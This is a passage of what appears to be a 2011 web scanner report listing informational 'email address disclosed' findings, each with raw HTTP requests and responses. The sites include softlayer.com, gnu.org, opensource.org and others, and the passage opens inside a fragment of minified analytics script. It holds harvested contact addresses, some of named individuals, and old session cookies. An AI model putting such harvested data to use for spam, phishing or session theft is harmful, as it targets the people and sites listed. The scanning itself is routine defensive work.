+"_r)s.p_r()}^7(qs);^y`o(@g;`k@g`L^9,`F$51',vb`R@G=^D=s.`N`g=s.`N^K=`E^z^x=s.ppu=^n=^nv1=^nv2=^nv3`h`5$t)`E^z@G=`E^zeo=`E^z`N`g=`E^z`N^K`h`5!id@Us.tc){s.tc=1;s.flush`Z()}`2$h`Atl`0o,t,n,vo`1;s.@G=@uo"
+"`R`N^K=t;s.`N`g=n;s.t(@g}`5pg){`E^zco`0o){`K@J\"_\",1,#8`2@uo)`Awd^zgs`0$P{`K@J$k1,#8`2s.t()`Awd^zdc`0$P{`K@J$k#8`2s.t()}}@2=(`E`I`X`8`4@ss@b0`Rd=
...[SNIP]...

16.5. http://www.fark.com/cgi/farkit.pl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fark.com
Path:   /cgi/farkit.pl

Issue detail

The following email address was disclosed in the response:

Request

GET /cgi/farkit.pl HTTP/1.1
Host: www.fark.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:07:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Server: Apache
P3P: CP="CAO PSA OUR"
Set-Cookie: FarkUser=v7aH50e9gtrYYySpXPTIo-nBHGZ9nVB94SwKRg1VwhFj-9-YQL5BzG0ppgaq3-8tel444UtsZSFScvB7a-XxADQaRnWCK; Domain=.fark.com; Expires=Sat, 30-Jun-2012 14:07:35 GMT; Max-Age=31104000; Path=/; Version=1; HttpOnly
Expires: Wed, 06 Jul 2011 14:07:35 GMT
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate
Content-Length: 36547

<!doctype html>
<!-- paulirish.com/2008/conditional-stylesheets-vs-css-hacks-answer-neither/ -->
<!--[if lt IE 7 ]> <html class="no-js ie6" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-j
...[SNIP]...
<a target="_blank" rel="nofollow" href="http://chat.mibbit.com/#fark@irc.fdfnet.net">
...[SNIP]...

16.6. http://www.gnu.org/licenses/gpl.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gnu.org
Path:   /licenses/gpl.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /licenses/gpl.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:22 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:21:22 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http
...[SNIP]...
<link rev="made" href="mailto:webmasters@gnu.org" />
...[SNIP]...
<input type="text" id="frmEmail" name="email-Primary" size="15" maxlength="80" value="you@example.com" onfocus="this.value=''" />
...[SNIP]...
<a href="mailto:gnu@gnu.org"><em>gnu@gnu.org</em>
...[SNIP]...
<a href="mailto:webmasters@gnu.org"><em>webmasters@gnu.org</em>
...[SNIP]...
<!-- advise web-translators@gnu.org and add it to -->
...[SNIP]...

16.7. http://www.masshightech.com/tech-news-widget/widget.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.masshightech.com
Path:   /tech-news-widget/widget.js

Issue detail

The following email address was disclosed in the response:

Request

GET /tech-news-widget/widget.js HTTP/1.1
Host: www.masshightech.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:00:24 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 24 Jun 2009 16:00:16 GMT
Accept-Ranges: bytes
Cteonnt-Length: 8381
Connection: close
Content-Type: application/x-javascript
Set-Cookie: NSC_xxx.nbttijhiufdi.dpn-wtfsw=e243cf7e3660;expires=Wed, 06-Jul-11 14:12:33 GMT;path=/
Cache-Control: private
Content-Length: 8381

/**
* Mass High Tech Widget
* version 1.2
*
* Copyright (c) 2009, All Rights Reserved Worldwide
*
* author Fred LeBlanc <fred@suredev.com> of SureDev via Boston Web Studio
* created for
...[SNIP]...

16.8. http://www.mixx.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mixx.com
Path:   /submit

Issue detail

The following email address was disclosed in the response:

Request

GET /submit HTTP/1.1
Host: www.mixx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Wed, 06 Jul 2011 11:19:48 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k DAV/2 Phusion_Passenger/3.0.1
Status: 500 Internal Server Error
Vary: Accept-Encoding
Content-Length: 669
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
nathaniel@mixx.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

16.9. http://www.opensource.org/licenses/gpl-license.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:05:58 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=hgig1lfiopk95ql3u4pi3mr831; expires=Fri, 29-Jul-2011 17:39:18 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 06 Jul 2011 14:02:03 GMT
ETag: "1a6140a90b059f012afb34dbb1337aac"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7275
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="mailto:osi@opensource.org">
...[SNIP]...
<a href="mailto:webmaster@opensource.org">
...[SNIP]...

16.10. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:12 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=nckibgvdkif5pk4ruq9eiask34; expires=Fri, 29-Jul-2011 15:10:32 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 06 Jul 2011 11:32:17 GMT
ETag: "88cb710a049c0b384cfdb46952931378"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="mailto:osi@opensource.org">
...[SNIP]...
<a href="mailto:webmaster@opensource.org">
...[SNIP]...

16.11. http://www.sipc.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sipc.org
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.sipc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 13:57:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>SIPC - Securities Investor Protection Corporation</title>
<meta http-equiv="Content-Type" content="
...[SNIP]...
<a href="mailto:kphillips@hastingsgroup.com">
...[SNIP]...

16.12. http://www.sipc.org/members/sipclogo.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sipc.org
Path:   /members/sipclogo.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /members/sipclogo.cfm HTTP/1.1
Host: www.sipc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 13:57:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="keyw
...[SNIP]...
<a href="mailto:kphillips@hastingsgroup.com">
...[SNIP]...

16.13. http://www.softlayer.com/about/analyst-relations/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /about/analyst-relations/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about/analyst-relations/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:17 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:17 GMT
Connection: close
Content-Type: text/html
Content-Length: 22617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
<a
href="mailto:mquigley@softlayer.com">mquigley@softlayer.com</a>
...[SNIP]...

16.14. http://www.softlayer.com/about/careers/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /about/careers/

Issue detail

The following email address was disclosed in the response:

Request

GET /about/careers/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:17 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:17 GMT
Connection: close
Content-Type: text/html
Content-Length: 21288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...

16.15. http://www.softlayer.com/about/contact-us/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /about/contact-us/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about/contact-us/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:16 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:16 GMT
Connection: close
Content-Type: text/html
Content-Length: 26084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
<a
href="mailto:support@softlayer.com">support@softlayer.com</a>
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
<a
href="mailto:press@softlayer.com">press@softlayer.com</a>
...[SNIP]...
<a
href="mailto:accounting@softlayer.com">accounting@softlayer.com</a>
...[SNIP]...
<a
href="mailto:resumes@softlayer.com">resumes@softlayer.com</a>
...[SNIP]...

16.16. http://www.softlayer.com/about/feedback

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /about/feedback

Issue detail

The following email address was disclosed in the response:

Request

GET /about/feedback HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:18 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:18 GMT
Connection: close
Content-Type: text/html
Content-Length: 21557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...

16.17. http://www.softlayer.com/cloudlayer/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /cloudlayer/

Issue detail

The following email address was disclosed in the response:

Request

GET /cloudlayer/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:25 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:25 GMT
Connection: close
Content-Type: text/html
Content-Length: 23260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...

16.18. http://www.softlayer.com/dedicated/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /dedicated/

Issue detail

The following email address was disclosed in the response:

Request

GET /dedicated/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:23 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:23 GMT
Connection: close
Content-Type: text/html
Content-Length: 104124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...

16.19. http://www.softlayer.com/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /index.html HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:22 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:22 GMT
Connection: close
Content-Type: text/html
Content-Length: 29867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...

16.20. http://www.softlayer.com/legal/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /legal/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /legal/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:20 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:20 GMT
Connection: close
Content-Type: text/html
Content-Length: 21961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...
<a
href="mailto:legal@softlayer.com">legal@softlayer.com</a>
...[SNIP]...
<a
href="mailto:copyright@softlayer.com">copyright@softlayer.com</a>
...[SNIP]...
<a
href="mailto:abuse@softlayer.com">abuse@softlayer.com</a>
...[SNIP]...
<a
href="mailto:subpoenas@softlayer.com">subpoenas@softlayer.com</a>
...[SNIP]...

16.21. http://www.softlayer.com/partners/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /partners/

Issue detail

The following email address was disclosed in the response:

Request

GET /partners/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:27 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:27 GMT
Connection: close
Content-Type: text/html
Content-Length: 40276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="ht
...[SNIP]...
<a href="mailto:sales@softlayer.com">
...[SNIP]...
<a href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...

16.22. http://www.softlayer.com/press

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /press

Issue detail

The following email address was disclosed in the response:

Request

GET /press HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:28 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:28 GMT
Connection: close
Content-Type: text/html
Content-Length: 76287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...

16.23. http://www.softlayer.com/resources/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /resources/

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:22 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:22 GMT
Connection: close
Content-Type: text/html
Content-Length: 23896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...

16.24. http://www.softlayer.com/resources/mobile-apps/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /resources/mobile-apps/

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/mobile-apps/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:21 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:21 GMT
Connection: close
Content-Type: text/html
Content-Length: 24909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...

16.25. http://www.softlayer.com/sitemap/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /sitemap/

Issue detail

The following email address was disclosed in the response:

Request

GET /sitemap/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:29 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:29 GMT
Connection: close
Content-Type: text/html
Content-Length: 27263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...

16.26. http://www.softlayer.com/solutions/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /solutions/

Issue detail

The following email address was disclosed in the response:

Request

GET /solutions/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:26 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:26 GMT
Connection: close
Content-Type: text/html
Content-Length: 24742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...

16.27. http://www.softlayer.com/specials/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /specials/

Issue detail

The following email address was disclosed in the response:

Request

GET /specials/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:29 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:29 GMT
Connection: close
Content-Type: text/html
Content-Length: 20444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...

16.28. http://www.softlayer.com/virtualization/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /virtualization/

Issue detail

The following email address was disclosed in the response:

Request

GET /virtualization/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:25 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:25 GMT
Connection: close
Content-Type: text/html
Content-Length: 22859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<a
href="mailto:sales@softlayer.com">
...[SNIP]...
<a
href="mailto:sales@softlayer.com">sales@softlayer.com</a>
...[SNIP]...

16.29. http://www.ubs.com/1/e/index/phishing.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ubs.com
Path:   /1/e/index/phishing.html

Issue detail

The following email address was disclosed in the response:

Request

GET /1/e/index/phishing.html HTTP/1.1
Host: www.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:58 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 21773
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 0
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

